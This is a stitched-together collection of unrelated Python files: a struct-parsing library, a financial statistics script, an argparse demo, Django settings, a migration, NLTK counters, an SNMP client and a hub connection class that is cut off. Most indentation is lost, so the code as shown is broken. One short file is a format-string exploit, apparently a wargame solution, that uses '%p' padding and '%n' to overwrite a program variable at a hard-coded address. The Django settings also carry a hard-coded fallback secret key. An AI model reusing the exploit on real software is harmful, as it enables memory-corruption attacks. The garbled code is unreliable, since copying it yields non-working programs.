from easy_struct.base_types import IntBits, Int, Float, String, Array, Bytes
from typing import Optional, Union, Any
########################################################################################################################
# Helper functions for base DataStructure
########################################################################################################################
def loff(offset: int, tabsize: int, string: str) -> str:
return str(" " * (tabsize * offset)) + string
def prefix(offset: int, tabsize: int, name: str, align: int) -> str:
return str(" " * (tabsize * offset)) + name + ': ' + str(" " * (align - len(name)))
def size_fmt(num: int, kibibyte: bool = True) -> str:
base, suffix = [(1000., 'B'), (1024., 'iB')][kibibyte]
for x in ['B'] + [x + suffix for x in list('kMGTP')]:
if -base < num < base:
break
num /= base
return "{} {}".format(num, x) if x == 'B' else "{:3.2f} {}".format(num, x)
def fmt_int(name: str, metadata: Any, value: int, tabsize: int, offset: int, align: int) -> str:
if not isinstance(value, int):
return prefix(offset, tabsize, name, align) + str(value) + "\n"
bits = metadata.bits if hasattr(metadata, 'bits') else metadata.bytes * 8
raw_value = value & ((1 << bits) - 1) if value < 0 else value
if metadata.print_format in ('x', 'X'):
fmt = "0x{{:0{}{}}}".format(bits // 4, metadata.print_format)
msg = prefix(offset, tabsize, name, align) + fmt.format(raw_value)
elif metadata.print_format in ('o', 'O'):
msg = prefix(offset, tabsize, name, align) + "0{:o}".format(raw_value)
elif metadata.print_format in ('b', 'B'):
fmt = "0b{{:0{}b}}".format(bits)
        msg = prefix(offset, tabsize, name, align) + fmt.format(raw_value)
elif metadata.print_format in ('z', 'Z'):
msg = prefix(offset, tabsize, name, align)
msg += "{} ({})".format(value, size_fmt(value, metadata.print_format == 'z'))
else:
msg = prefix(offset, tabsize, name, align) + str(value)
if isinstance(metadata.choices, type) and issubclass(metadata.choices, Enum):
# msg += " ({}[{}])".format(metadata.choices.__name__, metadata.choices[value])
msg += " ({})".format(metadata.choices[value])
return msg + '\n'
def fmt_bytes(name: str, metadata: Any, data: bytearray, tabsize: int = 4, offset: int = 0, line_size: int = 16) -> str:
if len(data) >= (16 ** 8):
raise ValueError("hexdump cannot process more than 16**8 or 4294967296 bytes")
fmt = "{{:0{}X}} | {{:<{}s}} | {{}}\n".format(4 if len(data) < (16 ** 4) else 8, 3 * line_size - 1)
msg = loff(offset, tabsize, "{}[{}]:\n".format(name, len(data)))
for i in range(0, len(data), line_size):
hex_text = " ".join(format(c, '02X') for c in data[i: i + line_size])
raw_text = "".join(chr(c) if 32 <= c < 128 else '.' for c in data[i: i + line_size])
msg += loff(offset + 1, tabsize, fmt.format(i, hex_text, raw_text))
if i > line_size * 10:
msg += loff(offset + 1, tabsize, "...\n")
break
return msg
def fmt_array(name: str, metadata: Any, data: list, tabsize: int = 4, offset: int = 0) -> str:
msg = str()
msg += loff(offset, tabsize, "{}[{} * {}]:\n".format(name, len(data), metadata.item_type.__class__.__name__))
msg += loff(offset + 1, tabsize, "{}\n".format(data))
return msg
def fmt_string(name: str, metadata: Any, value: str, tabsize: int, offset: int, align: int) -> str:
msg = prefix(offset, tabsize, name, align) + "\"{}\"\n".format(value)
return msg
########################################################################################################################
# Metaclass for base DataStructure
########################################################################################################################
class MetaStructure(type):
""" MetaClass for Structure Type """
def __new__(mcs, name, bases, ns, endian=None):
if name != 'DataStructure':
if '__annotations__' in ns:
for key, value in ns['__annotations__'].items():
if isinstance(value, type):
value = ns['__annotations__'][key] = value()
if not isinstance(value, (Struct, Int, IntBits, Float, String, Bytes, Array)):
raise Exception()
if endian and isinstance(value, (Int, Float)):
value.endian = endian
# create class attribute with default value
ns[key] = value.default
else:
annotations = {}
for key, value in ns.items():
# ignore hidden class attributes
if key in set(dir(type(name, (object,), {}))) or (key.startswith('_') and key.endswith('_')):
continue
# ignore methods and properties
if isinstance(value, type(Struct.validate)) or isinstance(value, staticmethod) or \
isinstance(value, classmethod) or isinstance(value, property):
continue
# convert class to objects
if isinstance(value, type):
value = value()
                    if not isinstance(value, (Struct, Int, IntBits, Float, String, Bytes, Array)):
raise Exception()
annotations[key] = value
ns[key] = value.default
ns['__annotations__'] = annotations
return super().__new__(mcs, name, bases, ns)
########################################################################################################################
# The base DataStructure class
########################################################################################################################
class DataStructure(metaclass=MetaStructure):
def __init__(self, **kwargs):
"""
"""
for name, metadata in getattr(self.__class__, '__annotations__', {}).items():
if name in kwargs:
value = metadata.validate(kwargs[name])
else:
value = metadata.default
if isinstance(metadata, Bytes) and value is None:
value = bytearray([metadata.empty] * metadata.size)
self.__dict__[name] = value
def __getitem__(self, key):
if not isinstance(key, str):
raise KeyError()
for name, metadata in getattr(self.__class__, '__annotations__', {}).items():
if metadata.name == key:
key = name
break
if key not in self.__dict__:
raise KeyError()
return getattr(self, key)
def __setitem__(self, key, value):
if not isinstance(key, str):
raise KeyError()
for name, metadata in getattr(self.__class__, '__annotations__', {}).items():
if metadata.name == key:
key = name
break
if key not in self.__dict__:
raise KeyError()
setattr(self, key, value)
def __setattr__(self, key, value):
if key in self.__dict__:
annotations = getattr(self.__class__, '__annotations__')
self.__dict__[key] = annotations[key].validate(value)
else:
prop_obj = getattr(self.__class__, key, None)
if isinstance(prop_obj, property):
if prop_obj.fset is None:
raise AttributeError("Property '{}' has not implemented setter".format(key))
prop_obj.fset(self, value)
else:
# super(DataStructure, self).__setattr__(key, value)
raise AttributeError("Add new attribute into object is forbidden")
def __contains__(self, key):
        return isinstance(key, str) and key in self.__dict__
def __iter__(self):
return self.__dict__.__iter__()
def __len__(self):
return len(self.__dict__)
def __eq__(self, obj):
if not isinstance(obj, DataStructure):
return False
for key, value in self.__dict__.items():
if key not in obj or value != obj[key]:
return False
return True
def update(self):
""" Update exporting data
Implement in child class if need do some changes before export
"""
pass
def validate(self):
""" Validate parsed data
Implement in child class if need do validate parsed data
"""
pass
def raw_size(self) -> int:
size = 0
index = 0
bsize = 0
items = getattr(self.__class__, '__annotations__', {})
names = tuple(items.keys())
while index < len(items):
name = names[index]
mdata = items[name]
index += 1
if isinstance(mdata, IntBits) and bsize < (mdata.offset + mdata.bits):
bsize = mdata.offset + mdata.bits
if index < len(items):
continue
if bsize > 0:
size += (bsize // 8) + 1 if bsize % 8 else bsize // 8
bsize = 0
continue
size += mdata.offset
if isinstance(mdata, Struct):
value = getattr(self, name)
size += value.raw_size()
            elif isinstance(mdata, Bytes):
value = getattr(self, name)
size += len(value)
else:
size += mdata.size
return size
def info(self, tabsize: int = 4, offset: int = 0, align: int = 0, show_all: bool = False) -> str:
"""
:param tabsize:
:param offset:
:param align:
:param show_all:
:return:
"""
self.update()
msg = str()
if self.__doc__:
msg += loff(offset, tabsize, '[ ' + self.__doc__ + ' ]\n')
for name, metadata in getattr(self.__class__, '__annotations__', {}).items():
value = getattr(self, name)
if name.startswith('_'):
name = name.lstrip('_')
if not hasattr(self, name) and not show_all:
continue
if metadata.name:
name = metadata.name
if metadata.description is not None:
msg += loff(offset, tabsize, "# {}\n".format(metadata.description))
if hasattr(metadata, 'print_format') and callable(metadata.print_format):
msg += metadata.print_format(name, value, tabsize, offset, align)
else:
if isinstance(metadata, Struct):
msg += loff(offset, tabsize, "{}:\n".format(name))
msg += value.info(tabsize, offset + 1, align, show_all)
elif isinstance(metadata, Array):
msg += fmt_array(name, metadata, value, tabsize, offset)
elif isinstance(metadata, Bytes):
msg += fmt_bytes(name, metadata, value, tabsize, offset)
elif isinstance(metadata, Int):
msg += fmt_int(name, metadata, value, tabsize, offset, align)
elif isinstance(metadata, IntBits):
msg += fmt_int(name, metadata, value, tabsize, offset, align)
else:
msg += fmt_string(name, metadata, value, tabsize, offset, align)
return msg
def export(self, empty: int = 0x00, update: bool = True, ignore: Optional[list] = None) -> bytes:
"""
:param empty:
:param update:
:param ignore:
:return:
"""
assert 0 <= empty <= 0xFF
index = 0
raw_data = b''
ib_range = 0
ib_values = []
ib_mdatas = []
items = getattr(self.__class__, '__annotations__', {})
if ignore:
items = {k: v for k, v in items.items() if k not in ignore}
names = tuple(items.keys())
if update:
self.update()
while index < len(items):
name = names[index]
mdata = items[name]
value = getattr(self, name)
index += 1
if isinstance(mdata, IntBits):
ib_values.append(value)
ib_mdatas.append(mdata)
if ib_range < (mdata.offset + mdata.bits):
ib_range = mdata.offset + mdata.bits
if index < len(items):
continue
if ib_values:
length = (ib_range // 8) + 1 if ib_range % 8 else ib_range // 8
raw_value = 0
for i, m in enumerate(ib_mdatas):
raw_value |= m.encode(ib_values[i])
raw_data += raw_value.to_bytes(length=length, byteorder='little', signed=False)
ib_range = 0
ib_values = []
ib_mdatas = []
else:
raw_data += bytes([empty] * mdata.offset)
raw_data += value.export(empty, update) if isinstance(mdata, Struct) else mdata.pack(value)
return raw_data
@classmethod
def parse(cls, data: bytes, offset: int = 0):
"""
:param data:
:param offset:
:return:
"""
if len(data) <= offset:
raise Exception()
index = 0
kwargs = {}
ib_range = 0
ib_names = []
ib_mdatas = []
items = cls.__annotations__
names = tuple(items.keys())
while index < len(items):
name = names[index]
mdata = items[name]
index += 1
if isinstance(mdata, IntBits):
ib_names.append(name)
ib_mdatas.append(mdata)
if ib_range < (mdata.offset + mdata.bits):
ib_range = mdata.offset + mdata.bits
if index < len(items):
continue
if ib_range:
length = (ib_range // 8) + 1 if ib_range % 8 else ib_range // 8
raw_value = int.from_bytes(data[offset: offset + length], byteorder='little', signed=False)
for i, m in enumerate(ib_mdatas):
kwargs[ib_names[i]] = m.decode(raw_value)
offset += length
else:
offset += mdata.offset
if isinstance(mdata, Struct):
value = mdata.struct.parse(data, offset)
offset += value.raw_size()
elif isinstance(mdata, Bytes):
length = mdata.length
if isinstance(length, str):
il = kwargs
for m in mdata.length.split('.'):
if not il or m not in il:
raise Exception()
il = il[m]
length = il
value = bytearray(data[offset: offset + length])
offset += length
else:
value = mdata.unpack(data, offset)
offset += mdata.size
kwargs[name] = value
obj = cls(**kwargs)
obj.validate()
return obj
########################################################################################################################
# The Struct Type as DataStructure container
########################################################################################################################
class Struct:
__slots__ = ('struct', 'offset', 'name', 'description')
def __init__(self, struct: MetaStructure, offset: int = 0, name: Optional[str] = None, desc: Optional[str] = None):
assert issubclass(struct, DataStructure)
self.name = name
self.offset = offset
self.struct = struct
self.description = desc
@property
def default(self):
return self.struct()
def validate(self, value):
if not isinstance(value, self.struct):
raise TypeError()
return value
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# This script performs the Kolmogorov-Smirnov test for invariance on the
# time intervals between subsequent events in high frequency trading.
# -
# ## For details, see [here](https://www.arpm.co/lab/redirect.php?permalink=exer-expiid-copy-1).
# +
# ## Prepare the environment
# +
import os
import os.path as path
import sys
sys.path.append(path.abspath('../../functions-legacy'))
from numpy import where, diff, array
from scipy.io import loadmat
import matplotlib.pyplot as plt
from matplotlib.pyplot import figure
plt.style.use('seaborn')
from CONFIG import GLOBAL_DB, TEMPORARY_DB
from ARPM_utils import save_plot, date_mtop, struct_to_dict, time_mtop
from TestKolSmirn import TestKolSmirn
from InvarianceTestKolSmirn import InvarianceTestKolSmirn
from TradeQuoteProcessing import TradeQuoteProcessing
# -
# ## Upload the database
# +
try:
db = loadmat(os.path.join(GLOBAL_DB, 'db_US_10yr_Future_quotes_and_trades'),squeeze_me=True)
except FileNotFoundError:
db = loadmat(os.path.join(TEMPORARY_DB, 'db_US_10yr_Future_quotes_and_trades'),squeeze_me=True)
quotes = struct_to_dict(db['quotes'], as_namedtuple=False)
trades = struct_to_dict(db['trades'], as_namedtuple=False)
# -
# ## Process the time series, refining the raw data coming from the database
# +
dates_quotes = quotes['time_names'] #
t = quotes['time'] # time vector of quotes
p_bid = quotes['bid'] # bid prices
p_ask = quotes['ask'] # ask prices
q_bid = quotes['bsiz'] # bid volumes
q_ask = quotes['asiz'] # ask volumes
dates_trades = trades['time_names'] #
t_k = trades['time'] # time vector of trades
p_last = trades['price'] # last transaction prices
delta_q = trades['siz'] # flow of traded contracts' volumes
delta_sgn = trades['aggress'] # trade sign flow
# match events: the value "1" indicates the start of a match event while zeros indicate its continuation;
# the db is ordered such that the start of a match event is in the last column corresponding to that event
match = trades['mtch']
t, _, _, _, _, _, t_k, *_ = TradeQuoteProcessing(t, dates_quotes, q_ask, p_ask, q_bid, p_bid, t_k, dates_trades,
p_last, delta_q, delta_sgn, match)
t = t.flatten()
t_k = t_k.flatten()
# ## Compute the gaps between subsequent events
k_0 = where(t_k >= t[0])[0][0] # index of the first trade within the time window
k_1 = where(t_k <= t[len(t)-1])[0][-1] # index of the last trade within the time window
t_ms = array([time_mtop(i) for i in t_k[k_0:k_1+1]])
t_k = array([3600*i.hour+60*i.minute+i.second+i.microsecond/1e6 for i in t_ms])
delta_t_k = diff(t_k).reshape(1,-1) # gaps
# -
# ## Perform the Kolmogorov-Smirnov test
s_1, s_2, int, F_1, F_2, up, low = TestKolSmirn(delta_t_k)
# ## Plot the results of the IID test
# +
# position settings
pos = {}
pos[1] = [0.1300, 0.74, 0.3347, 0.1717]
pos[2] = [0.5703, 0.74, 0.3347, 0.1717]
pos[3] = [0.1300, 0.11, 0.7750, 0.5]
pos[4] = [0.03, 1.71]
# create figure
f = figure()
InvarianceTestKolSmirn(delta_t_k, s_1, s_2, int, F_1, F_2, up, low, pos, 'Kolmogorov-Smirnov invariance test',
[-0.3, 0]);
# save_plot(ax=plt.gca(), extension='png', scriptname=os.path.basename('.')[:-3], count=plt.get_fignums()[-1])
|
# using argparse library from a file
import argparse
parser = argparse.ArgumentParser(
prog="fromfile_example",
usage="%(prog)s [options] @file_name",
fromfile_prefix_chars="@",
description="getting arguments from file",
epilog="enjoy python * - *",
)
parser.add_argument("a", help="a first argument")
parser.add_argument("b", help="a second argument")
parser.add_argument("c", help="a third argument")
parser.add_argument("d", help="a fourth argument")
parser.add_argument("e", help="a fifth argument")
parser.add_argument(
"-v", "--verbose", action="store_true", help="an optional argument"
)
args = parser.parse_args()
print("if u read this line, that means u provided all the parameters")
test = args.a
test2 = args.b
test3 = args.c
test4 = args.d
test5 = args.e
print(" ".join(c for c in [test, test2, test3, test4, test5]))
|
import os
import logging.config
from django.core.urlresolvers import reverse_lazy
DEBUG = True
TEMPLATE_DEBUG = DEBUG
ADMINS = (
('Wilfred Hughes', '[email protected]'),
)
MANAGERS = ADMINS
PROJECT_ROOT = os.path.dirname(__file__)
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.getenv('DB_PATH', os.path.join(PROJECT_ROOT, 'picky.db')),
}
}
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# On Unix systems, a value of None will cause Django to use the same
# timezone as the operating system.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = 'Europe/London'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-gb'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale
USE_L10N = True
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/home/media/media.lawrence.com/media/"
MEDIA_ROOT = ''
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://media.lawrence.com/media/", "http://example.com/media/"
MEDIA_URL = ''
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/home/media/media.lawrence.com/static/"
STATIC_ROOT = os.path.join(PROJECT_ROOT, 'staticfiles')
# URL prefix for static files.
# Example: "http://media.lawrence.com/static/"
STATIC_URL = '/static/'
# URL prefix for admin static files -- CSS, JavaScript and images.
# Make sure to use a trailing slash.
# Examples: "http://foo.com/static/admin/", "/static/admin/".
ADMIN_MEDIA_PREFIX = '/static/admin/'
# Additional locations of static files
STATICFILES_DIRS = (
os.path.join(PROJECT_ROOT, "static"),
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
# Make this unique, and don't share it with anybody.
SECRET_KEY = os.environ.get(
'SECRET_KEY',
'z9ti4&cb5(+)vqhw%!*)fd_q_2ig9jldeaogpddjw@w%488l=)')
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)
TEMPLATE_CONTEXT_PROCESSORS = (
"django.contrib.auth.context_processors.auth",
"django.core.context_processors.debug",
"django.core.context_processors.i18n",
"django.core.context_processors.media",
"django.core.context_processors.static",
"django.core.context_processors.request",
"django.contrib.messages.context_processors.messages",
"picky.site_config.context_processors.include_config",
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'debug_toolbar.middleware.DebugToolbarMiddleware',
)
AUTHENTICATION_BACKENDS = (
'social_auth.backends.twitter.TwitterBackend',
'social_auth.backends.google.GoogleBackend',
'django.contrib.auth.backends.ModelBackend',
)
SOCIAL_AUTH_PIPELINE = (
# default
'social_auth.backends.pipeline.social.social_auth_user',
'social_auth.backends.pipeline.user.get_username',
'social_auth.backends.pipeline.user.create_user',
'social_auth.backends.pipeline.social.associate_user',
'social_auth.backends.pipeline.social.load_extra_data',
'social_auth.backends.pipeline.user.update_user_details',
# customisation
'picky.users.social_auth.new_users_inactive'
)
LOGIN_URL = reverse_lazy('login_picker')
LOGIN_REDIRECT_URL = reverse_lazy('index')
LOGIN_ERROR_URL = reverse_lazy('user_not_active')
SOCIAL_AUTH_FORCE_POST_DISCONNECT = True
ROOT_URLCONF = 'picky.urls'
TEMPLATE_DIRS = (
os.path.join(PROJECT_ROOT, 'templates'),
)
INSTALLED_APPS = (
# django apps
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
# third party apps
'django_nose',
'raven.contrib.django.raven_compat',
'social_auth',
'haystack',
'debug_toolbar',
'django_extensions',
# picky apps
'picky.pages',
'picky.comments',
'picky.users',
'picky.site_config',
)
if os.getenv('DUMMY_SEARCH', False):
HAYSTACK_CONNECTIONS = {
'default': {
'ENGINE': 'haystack.backends.simple_backend.SimpleEngine',
},
}
else:
HAYSTACK_CONNECTIONS = {
'default': {
'ENGINE': 'haystack.backends.whoosh_backend.WhooshEngine',
'PATH': os.path.join(os.path.dirname(__file__), 'whoosh_index'),
},
}
HAYSTACK_SIGNAL_PROCESSOR = 'haystack.signals.RealtimeSignalProcessor'
TEST_RUNNER = 'django_nose.NoseTestSuiteRunner'
LOGGING_CONFIG = None
LOG_LEVEL = os.getenv('DJANGO_LOG_LEVEL', 'info').upper()
# Based on
# https://www.digitalocean.com/community/tutorials/how-to-build-a-django-and-gunicorn-application-with-docker
logging.config.dictConfig({
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'console': {
'format': '%(asctime)s %(levelname)s [%(name)s:%(lineno)s] %(module)s %(process)d %(thread)d %(message)s',
},
},
'handlers': {
'console': {
'class': 'logging.StreamHandler',
'formatter': 'console',
},
},
'loggers': {
'': {
'level': LOG_LEVEL,
'handlers': ['console'],
},
},
})
INTERNAL_IPS = ('127.0.0.1',)
ALLOWED_HOSTS = ['localhost', '127.0.0.1', '[::1]']
if os.getenv('VIRTUAL_HOST'):
ALLOWED_HOSTS.append(os.getenv('VIRTUAL_HOST'))
if os.getenv('LETSENCRYPT_HOST'):
SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTOCOL', 'https')
WSGI_APPLICATION = "picky.wsgi.application"
try:
from live_settings import *
except ImportError:
pass
|
# Generated by Django 3.0.6 on 2020-07-12 08:31
from django.db import migrations
from django.db import models
class Migration(migrations.Migration):
dependencies = [("checkerapp", "0027_auto_20200712_0829")]
operations = [
migrations.RemoveField(model_name="alertplugin", name="custom_plugin"),
migrations.AddField(
model_name="pluginlist",
name="custom_plugin",
field=models.BooleanField(default=True),
),
]
|
import re, nltk
def word_count(raw, min_length = 1):
""" Function to count the number of words in a passage of text.
Supplying parameter 'min_length' gives number of words with
at least min_length letters.
"""
tokens = nltk.word_tokenize(raw)
return len([word for word in tokens if len(word) >= min_length])
def number_count(raw):
""" Function to count the number of numbers appearing in a
passage of text.
"""
results = re.findall(r'\b(?<=-)?[,0-9\.]+(?=\s)', raw)
results = [result for result in results
if not re.match(r'(199|20[01])\d', result)
and re.search(r'[0-9]', result)]
return len(results)
def sent_count(raw):
"""
Function to count the number of sentences in a passage.
"""
sent_tokenizer = nltk.data.load('tokenizers/punkt/english.pickle')
sents = sent_tokenizer.tokenize(raw)
return len(sents)
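# A minimal usage sketch; the sample passage is illustrative and sent_count()
# assumes the NLTK "punkt" model has been downloaded (nltk.download('punkt')).
if __name__ == '__main__':
    sample = "In 2015 we sold 3 items for 4.50 each. Prices rose later."
    print(word_count(sample))                 # number of tokens in the passage
    print(word_count(sample, min_length=4))   # tokens with at least 4 characters
    print(number_count(sample))               # 2: counts "3" and "4.50", skips the year 2015
    print(sent_count(sample))                 # 2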
|
# nm format-two | grep changeme
target = "\x68\x98\x04\x08"
diff = len("AAAAffffd896.100.0.f7f84b67.ffffd6e0.ffffd6c8.80485a0.ffffd5c0.ffffd896.100.3e8.41414141".split("."))
payload = target + "%p" * (diff - 1) + "%n"
print payload
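# Sketch of what the payload does (offsets come from the probe output quoted above):
# the 4-byte little-endian address of "changeme" (found via `nm format-two | grep
# changeme`) is placed at the start of the format string; the probe showed the
# buffer itself appearing as the 12th stack argument (the "41414141" field), so
# 11 "%p" conversions consume the preceding arguments and the final "%n" writes
# the number of bytes printed so far into that address.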
|
__all__ = "Snmp"
import ipaddress
from types import TracebackType
from typing import Any, List, Optional, Tuple, Type, Union
from .connection import SnmpConnection
from .exceptions import SnmpUnsupportedValueType
from .message import (
GetBulkRequest,
GetNextRequest,
GetRequest,
SetRequest,
SnmpMessage,
SnmpVarbind,
SnmpVersion,
)
class Snmp(SnmpConnection):
__slots__ = ("version", "community", "non_repeaters", "max_repetitions")
def __init__(
self,
*,
version: SnmpVersion = SnmpVersion.v2c,
community: str = "public",
non_repeaters: int = 0,
max_repetitions: int = 10,
**kwargs: Any,
) -> None:
super().__init__(**kwargs)
self.version: SnmpVersion = version
self.community: str = community
self.non_repeaters: int = non_repeaters
self.max_repetitions: int = max_repetitions
def __enter__(self) -> "Snmp":
return self
def __exit__(
self,
exc_type: Optional[Type[BaseException]],
exc_val: Optional[BaseException],
exc_tb: Optional[TracebackType],
) -> Optional[bool]:
self.close()
return None
async def _send(self, message: SnmpMessage) -> List[SnmpVarbind]:
if self._protocol is None:
await self._connect()
assert self._protocol
assert self._peername is not None
return await self._protocol._send(
message,
self._peername[:2] if isinstance(self._peername, tuple) else self._peername,
)
async def get(self, oids: Union[str, List[str]]) -> List[SnmpVarbind]:
if isinstance(oids, str):
oids = [oids]
message = SnmpMessage(
self.version, self.community, GetRequest([SnmpVarbind(oid) for oid in oids])
)
return await self._send(message)
async def get_next(self, oids: Union[str, List[str]]) -> List[SnmpVarbind]:
if isinstance(oids, str):
oids = [oids]
message = SnmpMessage(
self.version,
self.community,
GetNextRequest([SnmpVarbind(oid) for oid in oids]),
)
return await self._send(message)
async def get_bulk(
self,
oids: Union[str, List[str]],
*,
non_repeaters: Optional[int] = None,
max_repetitions: Optional[int] = None,
) -> List[SnmpVarbind]:
if isinstance(oids, str):
oids = [oids]
nr: int = self.non_repeaters if non_repeaters is None else non_repeaters
mr: int = self.max_repetitions if max_repetitions is None else max_repetitions
message = SnmpMessage(
self.version,
self.community,
GetBulkRequest([SnmpVarbind(oid) for oid in oids], nr, mr),
)
return await self._send(message)
async def walk(self, oid: str) -> List[SnmpVarbind]:
varbinds: List[SnmpVarbind] = []
message = SnmpMessage(
self.version, self.community, GetNextRequest([SnmpVarbind(oid)])
)
base_oid = oid if oid.startswith(".") else f".{oid}"
vbs = await self._send(message)
next_oid = vbs[0].oid
if not next_oid.startswith(f"{base_oid}."):
message = SnmpMessage(
self.version, self.community, GetRequest([SnmpVarbind(base_oid)])
)
return await self._send(message)
varbinds.append(vbs[0])
while True:
message = SnmpMessage(
self.version, self.community, GetNextRequest([SnmpVarbind(next_oid)])
)
vbs = await self._send(message)
next_oid = vbs[0].oid
if not next_oid.startswith(f"{base_oid}."):
break
varbinds.append(vbs[0])
return varbinds
async def set(
self, varbinds: List[Tuple[str, Union[int, str, bytes, ipaddress.IPv4Address]]]
) -> List[SnmpVarbind]:
for varbind in varbinds:
if not isinstance(varbind[1], (int, str, bytes, ipaddress.IPv4Address)):
raise SnmpUnsupportedValueType(
f"Only int, str, bytes and ip address supported, got {type(varbind[1])}"
)
message = SnmpMessage(
self.version,
self.community,
SetRequest([SnmpVarbind(oid, value) for oid, value in varbinds]),
)
return await self._send(message)
async def bulk_walk(
self,
oid: str,
*,
non_repeaters: Optional[int] = None,
max_repetitions: Optional[int] = None,
) -> List[SnmpVarbind]:
nr: int = self.non_repeaters if non_repeaters is None else non_repeaters
mr: int = self.max_repetitions if max_repetitions is None else max_repetitions
base_oid: str = oid if oid.startswith(".") else f".{oid}"
varbinds: List[SnmpVarbind] = []
message = SnmpMessage(
self.version,
self.community,
GetBulkRequest([SnmpVarbind(base_oid)], nr, mr),
)
vbs: List[SnmpVarbind] = await self._send(message)
next_oid: str = ""
for i, vb in enumerate(vbs):
if not vb.oid.startswith(f"{base_oid}.") or vb.value is None:
if i == 0:
message = SnmpMessage(
self.version,
self.community,
GetRequest([SnmpVarbind(base_oid)]),
)
return await self._send(message)
return varbinds
varbinds.append(vb)
next_oid = vb.oid
while next_oid:
message = SnmpMessage(
self.version,
self.community,
GetBulkRequest([SnmpVarbind(next_oid)], nr, mr),
)
vbs = await self._send(message)
for vb in vbs:
if not vb.oid.startswith(f"{base_oid}.") or vb.value is None:
next_oid = ""
break
varbinds.append(vb)
next_oid = vb.oid
return varbinds
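# Hedged usage sketch: the host/port keyword arguments below are assumptions,
# since SnmpConnection's constructor lives in another module. All query methods
# are coroutines, so they have to be awaited from an event loop:
#
#   import asyncio
#
#   async def demo():
#       with Snmp(host="192.0.2.1", port=161, community="public") as snmp:
#           sysdescr = await snmp.get("1.3.6.1.2.1.1.1.0")
#           interfaces = await snmp.bulk_walk("1.3.6.1.2.1.2.2")
#           return sysdescr, interfaces
#
#   asyncio.run(demo())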
|
#!/usr/bin/env python
# encoding: utf-8
#
# @Author: José Sánchez-Gallego
# @Date: Mar 8, 2018
# @Filename: hub.py
# @License: BSD 3-Clause
# @Copyright: José Sánchez-Gallego
from __future__ import division
from __future__ import print_function
from __future__ import absolute_import
import re
from . import device
class HubConnection(device.TCPDevice):
"""A device connection to the Hub.
    This class implements a `~device.TCPDevice` connection to the Hub that
listens for new keywords and updates a datamodel.
Parameters:
host (str):
The host where the hub is running.
port (int):
The port on which the hub is running.
use_datamodel (bool):
Whether the connection should listen for new keywords from the
Hub and update a datamodel.
datamodel_casts (dict):
A dictionary of the form ``'actor.keyword': func`` that defines
how to cast the values of that keyword.
E.g., ``{'guider.cartridgeLoaded': int}``.
datamodel_callbacks (dict):
A dictionary, similar to ``datamodel_casts`` with a callback
            function to call when the keyword gets updated.
"""
def __init__(self, host, port=6093, use_datamodel=True,
datamodel_casts=None, datamodel_callbacks=None, **kwargs):
device.TCPDevice.__init__(self, name='hub', host=host, port=port, **kwargs)
self.connect()
if use_datamodel:
self.datamodel = HubModel(casts=datamodel_casts, callbacks=datamodel_callbacks)
else:
self.datamodel = None
def init(self, userCmd=None, timeLim=None, getStatus=True):
pass
def handleReply(self, reply_str):
if self.datamodel is None:
return
reply_str = reply_str.strip()
if not reply_str:
return
matched = re.match(r'^(?P<commanderID>.+) (?P<cmdID>[0-9]+) '
r'(?P<userID>.+) (?P<severity>[a-z,A-Z,:]) '
r'(?P<cmd>.+)$', reply_str)
if matched:
group = matched.groupdict()
if group['userID'] in ['cmds', 'keys']:
return
# keypairs = re.findall('(.+)=(.+);*', group['cmd'])
keyvalue_pairs = map(lambda x: x.strip(), group['cmd'].split(';'))
for pair in keyvalue_pairs:
if '=' not in pair:
key = pair
value = None
else:
key, value = pair.split('=', 1)
actor = group['userID']
if actor not in self.datamodel:
self.datamodel.add_model(actor)
self.datamodel[actor][key] = value
class ActorModel(dict):
"""A dictionary defining a datamodel for an actor.
Parameters:
name (str):
The name of the actor.
casts (dict):
A dictionary of the form ``'keyword': func`` that defines
how to cast the values of that keyword.
E.g., ``{'cartridgeLoaded': int}``.
callbacks (dict):
A dictionary, similar to ``datamodel_casts`` with a callback
            function to call when the keyword gets updated.
"""
def __init__(self, name, casts=None, callbacks=None):
super(ActorModel, self).__init__()
self.name = name
self.casts = casts or dict()
self.callbacks = callbacks or dict()
def __setitem__(self, key, value):
def try_cast(value):
try:
return self.casts[key](value)
except ValueError:
return value
unquoted = list(map(lambda xx: re.sub(r'^"|"$', '', xx), str(value).split(',')))
if key in self.casts:
dict.__setitem__(self, key, list(map(try_cast, unquoted)))
else:
dict.__setitem__(self, key, unquoted)
if key in self.callbacks:
self.callbacks[key](dict.__getitem__(self, key))
class HubModel(dict):
"""A dictionary defining a datamodel for multiple actors.
Parameters:
casts (dict):
A dictionary of the form ``'actor.keyword': func`` that defines
how to cast the values of that keyword.
E.g., ``{'guider.cartridgeLoaded': int}``.
callbacks (dict):
A dictionary, similar to ``casts`` with a callback function to
            call when the keyword gets updated.
"""
def __init__(self, casts=None, callbacks=None):
casts = casts or dict()
callbacks = callbacks or dict()
super(HubModel, self).__init__()
# Creates a list of all actors defined in casts or callbacks
